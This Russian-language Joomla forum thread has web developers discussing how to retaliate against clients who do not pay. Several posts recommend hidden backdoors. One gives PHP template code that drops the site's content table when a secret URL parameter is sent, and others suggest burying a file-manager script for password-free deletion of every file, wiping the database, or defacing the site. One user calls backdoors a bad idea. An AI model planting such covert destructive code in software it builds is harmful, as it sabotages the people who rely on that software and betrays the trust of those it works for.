Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 59 Ответов
  • 9953 Просмотров
*

justalex

  • Захожу иногда
  • 88
  • 0 / 0
  • продам большой адронный коллайдер - по дешевке
Думаю многие из вас, встречали клиентов которые просят разработать сайт на своем хостинге и домене. Таким образом если клиент не совсем честный, то может пресечь вам все возможные доступы, и оставить Вас без оплаты после разработки сайта. Как в таком случае можно бороться с клиентом? И есть ли какие то "черные хода" для разработчика?
*

beliyadm

  • Легенда
  • 9758
  • 1664 / 66
  • Севастополь, Россия
1 - делать бекдор, убивающий по запросу БД и файлы (через обращения браузера) - нехорошее решение
2 - разрабатывать и тестировать на своей площадке, переносить только после оплаты - хорошее решение
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

Adeptus

  • Завсегдатай
  • 1861
  • 219 / 15
Самый простой вариант:

в индекс шаблона пишем

Код
$task = $_REQUEST['task'];

switch ($task) {
     case 'qwerty':
         $database->setQuery("DROP TABLE #__content");
         $database->query();
          break;
     default:
//тут собственно код шаблона
          break;
}

Теперь по запросу http://site.ru?task=qwerty - уничтожается таблица контента. :)
*

beliyadm

  • Легенда
  • 9758
  • 1664 / 66
  • Севастополь, Россия
Самый простой вариант:
в индекс шаблона пишем
самый простой, но элементарно грамотный человек это вычистит.
Я обычно делаю в виде отдельного файла, запрятанного в глубине движка, чтобы хрен достанешь
Ну и рекурсивно обработать все заданные каталоги, чтобы снести полностью, недавно с Era обсуждали подобную штуку
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
Самый простой вариант:

в индекс шаблона пишем

Код
$task = $_REQUEST['task'];

switch ($task) {
     case 'qwerty':
         $database->setQuery("DROP TABLE #__content");
         $database->query();
          break;
     default:
//тут собственно код шаблона
          break;
}

Теперь по запросу http://site.ru?task=qwerty - уничтожается таблица контента. :)

а какой прикол? грамотный заказчик может сделать копию базы а потом и обнаружить эту фишку


Ну конечно всё зависит от грамотности человека. Я например не даю пароль в админку до оплаты проекта. Если оплата не поступет в течении нескольких дней, делаю себе копию и полностью стираю сайт. Иногда если проект дорогой, то просто у хостера меняю временно контактный емаил и пароль доступа в панель и фтп
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
и ещё забыл, есть очень прикольный файлик (убица файлов у хостера). Ложу его далеко и глубоко. Вызов этого фала даёт без пароля доступ ко всем файлам сайта, можно удалить всё нафиг. Пользоваться не приходилось, но можно

официальная страничка разработчика http://phpfm.sourceforge.net/
« Последнее редактирование: 19.11.2016, 17:39:22 от palexa »
*

justalex

  • Захожу иногда
  • 88
  • 0 / 0
  • продам большой адронный коллайдер - по дешевке
отлично) Будем бороться  ^-^
*

Виталик

  • Завсегдатай
  • 1244
  • 130 / 0
а можно как-то распологать сайт на хостинге клиента, но что-бы какие-то важные файлы подключались с моего хостинга?

или кодировать часть файлов?
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
Ну можешь БД держать у себя на хосте ....
Главное правило: утром деньги - вечером стулья

Наверно кое-где идет обсуждение "Как боритесь с нечестными вебмастерами?"
Ишак меня нюхал ...
Если помог - плюсуйте в карму.

и ещё забыл, есть очень прикольный файлик (убица файлов у хостера). Ложу его далеко и глубоко. Вызов этого фала даёт без пароля доступ ко всем файлам сайта, можно удалить всё нафиг. Пользоваться не приходилось, но можно
А если поподробнее об этом?
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
Очень мощная вещь, для удаления файлов на хостинге, скачать здесь
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Ого... я вот НИ РАЗУ не заливал ни бэкдоров, ни заплаток не делал...
Я что один такой белый и пушистый?

Очень мощная вещь, для удаления файлов на хостинге, скачать здесь
palexa пасиб, попробую (плюсы пока ставить не могу =) ), буду должен =)

Вот официальная страничка разработчика http://phpfm.sourceforge.net/ (продукт бесплатный).
« Последнее редактирование: 21.12.2010, 13:39:53 от 911 »
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Ого... я вот НИ РАЗУ не заливал ни бэкдоров, ни заплаток не делал...
Я что один такой белый и пушистый?
я тож такой! Если начинаются проблемы достаточно намекнуть что есть этот самый бэкдор и обычно все сразу устаканивается)
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Ого... я вот НИ РАЗУ не заливал ни бэкдоров, ни заплаток не делал...
Я что один такой белый и пушистый?
Нет ты не одинок :)
Но у меня правило делать все у себя на хостинге, за редким исключением, если работки на 5 минут.
хех у одного заказчика не хватила денег рассчитаться, выделил времени три недели (блин добрый я какой) - если не оплатит, ну пожалеет, мне и бэкдоры нафиг не нужны. (остальное коммерческая тайна)
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
Самый простой вариант:

в индекс шаблона пишем

Код
$task = $_REQUEST['task'];

switch ($task) {
     case 'qwerty':
         $database->setQuery("DROP TABLE #__content");
         $database->query();
          break;
     default:
//тут собственно код шаблона
          break;
}

Теперь по запросу http://site.ru?task=qwerty - уничтожается таблица контента. :)

Подробней можно, где этот код вставить, на примере стандартного шаблона
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
ООО спасибки... как-то не додумался. Главное чтобы бекапа не было. Восстановят и вычислят.
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
о ответить между какими строками код впихнуть низзя ?
*

volod3000

  • Захожу иногда
  • 379
  • 51 / 0
  • Чтобы ничего не делать, нужно многое сделать.
А мне больше вариант с PHP Filesystem Management Tool понравился,
и запихнуть его можно куда угодно, и найти его уж очень сложно будет
Мало открыть человеку глаза,
большинство еще просит указать дорогу
и ждет волшебного пенделя.
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
После поста volod3000 можно переименовать тему в: [Решено] Как боритесь с нечестными клиентами?

Ставьте плюс хорошему человеку.
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
+ конечно не жалко, но должна быть причина
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
+ конечно не жалко, но должна быть причина
Действительно помог нуждающимся.
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
кто помог, именно ?
*

MaxTishenko

  • Осваиваюсь на форуме
  • 25
  • 0 / 0
volod3000, а если права на файлы выставлены только на чтение, как данная тулза может спасти ситуацию?
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
В данной тулзе можно изменить права )))
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

skai

  • Завсегдатай
  • 1198
  • 153 / 1
  • skaiseo
хм.. поподробнее бы как ей пользоваться..
Наполнение вашего сайта - 1т.р. стр. (текст, изображения, мета, перелинковка). Гарантия высокого ранжирования. SEO консультация в подарок.
----------------------------------------------------------------------------------------------
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
Ну там всё само собой просто.
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
У меня не сработала тулза)) Хз даже почему. Ни удалить, ни переименовать файлы невозможно..
Правда редактировать можно, если на файл стоит chmod 666, а сменить права через утилиту не дает.
« Последнее редактирование: 17.05.2011, 19:44:05 от Aleks_El_Dia »
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
че там менять, смотри конфиг и рушай бд! или делай запрос на добавление в материалы строки "Владелец сайта гад не платит по счетам!"
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
В данном случае бд не задействована)))
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Core Design прощается с клиентами

Автор Olg

Ответов: 0
Просмотров: 585
Последний ответ 26.01.2018, 11:27:10
от Olg
Как вы работаете с трудными клиентами?

Автор Burbezzilo

Ответов: 23
Просмотров: 1197
Последний ответ 01.04.2017, 02:38:52
от SeBun